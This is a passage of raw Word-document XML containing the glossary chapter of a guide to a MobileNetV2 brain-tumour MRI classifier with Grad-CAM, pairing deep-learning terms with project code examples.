            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>`create_superimposed_overlay()`</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="440" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1E40AF"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Chapter 16: Glossary and Learning Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>16.1 Comprehensive Technical Glossary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1. Convolutional Neural Network (CNN)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A class of deep neural networks specialized for visual data that uses mathematical convolution filters to capture spatial hierarchies and spatial relationships between pixels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Project Example:* The MobileNetV2 backbone that inspects the $224 </w:t>
        <w:tab/>
        <w:t>imes 224$ MRI scan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2. Depthwise Separable Convolution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A factorized convolution that splits standard convolution into a depthwise spatial filter (one per channel) followed by a $1 </w:t>
        <w:tab/>
        <w:t>imes 1$ pointwise channel-combination convolution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*Project Example:* Used across MobileNetV2's inverted residual blocks to reduce computation by ~8x.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3. Global Average Pooling 2D (GAP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A dimensionality reduction technique that averages the 2D spatial height and width of each feature map into a single scalar value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Project Example:* Converts the $(7 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">imes 7 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">imes 1280)$ output of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>out_relu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> into a 1D vector of length $1,280$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4. Batch Normalization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A neural network layer that standardizes intermediate activations by subtracting the mini-batch mean and dividing by mini-batch standard deviation, accelerating convergence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Project Example:* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>layers.BatchNormalization(name="batch_norm_1")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in our classification head.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5. Dropout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A stochastic regularization technique where a random percentage of neuron outputs are zeroed during training to prevent feature co-adaptation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Project Example:* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>layers.Dropout(0.3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>layers.Dropout(0.2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in our classification head.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6. Transfer Learning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A machine learning technique where a model pre-trained on a source task (e.g. ImageNet) is reused as the starting point for a model on a target task (e.g. Brain MRI).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*Project Example:* Initializing MobileNetV2 with pre-trained ImageNet weights.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>7. Catastrophic Forgetting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The abrupt forgetting of previously learned generic representations when a pre-trained network is updated with large gradients on a new, small dataset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Project Example:* Prevented by setting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>base_model.trainable = False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8. Data Leakage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>When information from outside the training dataset (such as test samples) influences model training, leading to unrealistically optimistic validation metrics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Project Example:* Audited and proven 100% absent in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>01_data_exploration.ipynb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> via MD5 checksum checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>9. Categorical Cross-Entropy Loss</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The standard loss function for multi-class classification problems with mutually exclusive target labels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Project Example:* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tf.keras.losses.CategoricalCrossentropy()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>02_model_training.ipynb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10. Softmax Function</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>An activation function that normalizes a vector of arbitrary raw numbers (logits) into a probability distribution where all values fall in $[0.0, 1.0]$ and sum to $1.0$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Project Example:* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>layers.Dense(4, activation="softmax")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> producing our final 4 class probabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>11. Adam Optimizer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>An adaptive learning rate optimization algorithm combining the advantages of momentum (first moment) and RMSprop (second moment).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*Project Example:* Compiled with learning rate $0.001$ (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1e-3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>12. Early Stopping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A training regularization technique that halts training when performance on a monitored metric (e.g., validation loss) ceases to improve over a set patience window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Project Example:* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EarlyStopping(monitor="val_loss", patience=5, restore_best_weights=True)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>13. Model Checkpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A callback that saves the neural network architecture and weight tensors to disk whenever a new minimum loss is achieved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Project Example:* Saved </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>models/brain_tumor_mobilenetv2_full_scratch.keras</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>14. Grad-CAM (Gradient-weighted Class Activation Mapping)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>An explainable AI technique that computes gradients of the target class score with respect to convolutional feature maps to produce a coarse 2D localization heatmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Project Example:* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>compute_gradcam()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>15. `tf.GradientTape`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A Python context manager in TensorFlow that records tensor operations for automatic differentiation and gradient calculation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Project Example:* Used in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>compute_gradcam()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to extract $\frac{\partial y^c}{\partial A^k}$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>16. ColorMap JET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A standard rainbow thermal palette in OpenCV where low numbers are deep blue, medium numbers are cyan/green/yellow, and high numbers are bright red.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Project Example:* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cv2.applyColorMap(heatmap_uint8, cv2.COLORMAP_JET)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
